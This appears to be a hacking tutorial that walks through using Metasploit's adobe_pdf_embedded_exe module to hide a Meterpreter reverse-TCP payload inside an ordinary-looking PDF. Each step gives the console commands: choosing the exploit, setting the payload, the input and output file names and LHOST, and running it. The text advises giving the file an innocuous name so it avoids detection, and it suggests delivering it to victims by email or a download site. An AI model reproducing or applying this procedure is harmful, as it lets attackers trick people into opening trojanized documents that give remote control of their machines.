How to Embed a Backdoor Connection in an Innocent- Looking PDF
Step 1: Find the Appropriate Exploit
First, let's find the appropriate exploit by searching Metasploit for one that will use this version of Adobe
msf > search type:exploit platform:windows adobe pdf
In the screenshot above we can see that Metasploit listed all the exploits that met our criteria. Let's use the
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Step 2: Gather Info on This Exploit
Now let's take a look at the information available to us about this exploit:
msf > exploit (adobe_pdf_embedded_exe) > info
Note that in the description, Metasploit tells us that it embeds a Metasploit payload into an existing PDF
file. The resulting PDF can be sent to a target as part of a social engineering attack. In addition to sending
to the victim, one can also embed it into a website inviting the unsuspecting victim to download it.
Step 3: Set Our Payload
In our next step, we need to set our payload to embed into the PDF. Type:
msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Step 4: Set Options
Now that we chosen our exploit and set our payload, the only thing left to do is to set our options. Let's take
a look at the options for this exploit and payload by typing:
msf > exploit (adobe_pdf_embedded_exe) > show options
As you can see from the screenshot above, Metasploit requires us to provide an existing PDF where it can
embed the Meterpreter.
Let's set a file named chapter1.pdf, presumably some class notes (make certain that this file was created
with Reader 9 or earlier), to our INFILENAME option.
msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME chapter1.pdf
Then change the default FILENAME of the output file with the embedded Meterpreter to same innocuous
sounding chapter1.pdf. The default name is evil.pdf, but is likely to set off too many alarms.
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf
Then, set the LHOST (our system) to our IP address or
msf > exploit (adobe_pdf_embedded_exe) > set LHOST
Step 5: Double Check the Settings
msf > exploit (adobe_pdf_embedded_exe) > show options
Step 6: Exploit!
As you can see from the screenshot above, all our options are set all we need to do now exploit.
msf > exploit (adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named chapter1.pdf that contains the Meterpeter listener. Metasploit has
placed this file at /root/.msf4/local/chapter1.pdf.
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